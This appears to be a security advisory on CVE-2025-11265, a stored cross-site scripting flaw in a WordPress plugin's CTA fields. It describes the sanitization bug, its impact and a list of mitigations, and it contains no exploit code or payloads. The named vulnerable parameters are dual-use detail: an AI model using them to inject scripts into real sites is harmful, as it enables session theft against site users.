CVE-2025-11265 is a stored cross-site scripting vulnerability identified in the VK All in One Expansion Unit plugin for WordPress, affecting all versions up to and including 9.112.1. The vulnerability stems from a logic error in the plugin's CTA (Call To Action) save function, where sanitization callbacks are incorrectly referenced from the variable $custom_field_name instead of $custom_field_options. This mistake causes the sanitization routines to be bypassed entirely for the 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text' parameters. As a result, authenticated users with Contributor-level permissions or higher can inject arbitrary JavaScript code into pages managed by the plugin. When other users access these pages, the injected scripts execute in their browsers, potentially leading to session hijacking, privilege escalation, or unauthorized actions within the context of the victim's session. The vulnerability does not require user interaction beyond visiting the infected page and does not affect availability but compromises confidentiality and integrity. The CVSS 3.1 base score is 6.4, reflecting the network attack vector, low attack complexity, required privileges, no user interaction, and a scope change. No public exploits or patches are currently available, emphasizing the need for immediate attention from site administrators. The flaw is categorized under CWE-80, indicating improper neutralization of script-related HTML tags, a common XSS weakness. Given the widespread use of WordPress and the plugin's functionality, this vulnerability poses a moderate risk to many websites globally.

The primary impact of CVE-2025-11265 is the compromise of confidentiality and integrity of affected WordPress sites using the VK All in One Expansion Unit plugin. Attackers with Contributor-level access can inject malicious scripts that execute in the browsers of site visitors or administrators, potentially leading to session hijacking, theft of sensitive information, unauthorized actions on behalf of users, or defacement of web content. Although availability is not directly affected, the reputational damage and potential data breaches can have significant operational and financial consequences. Organizations relying on this plugin for marketing or content management may face increased risk of targeted attacks, especially if attackers escalate privileges or use the injected scripts to deliver further payloads. The requirement for authenticated access limits exposure but does not eliminate risk, as Contributor-level accounts are common in collaborative environments. The vulnerability's scope change means that the injected scripts can affect users beyond the initial attacker, amplifying the potential damage. Without patches or mitigations, the threat remains persistent and exploitable, particularly in environments with multiple contributors and high traffic.

1. Immediate mitigation involves restricting Contributor-level user permissions to trusted individuals only, minimizing the risk of malicious script injection. 2. Monitor and audit user-generated content, especially fields related to 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text', for suspicious or unexpected scripts. 3. Implement Web Application Firewall (WAF) rules to detect and block common XSS payloads targeting these parameters. 4. Apply Content Security Policy (CSP) headers to restrict the execution of inline scripts and limit script sources, reducing the impact of injected scripts. 5. Regularly back up website data and maintain an incident response plan to quickly restore affected pages if exploitation occurs. 6. Stay alert for official patches or updates from the plugin vendor and apply them promptly once available. 7. Consider temporarily disabling or replacing the VK All in One Expansion Unit plugin if immediate patching is not possible. 8. Educate content contributors about safe input practices and the risks of injecting untrusted content. These steps go beyond generic advice by focusing on controlling contributor access, monitoring specific vulnerable parameters, and leveraging layered defenses.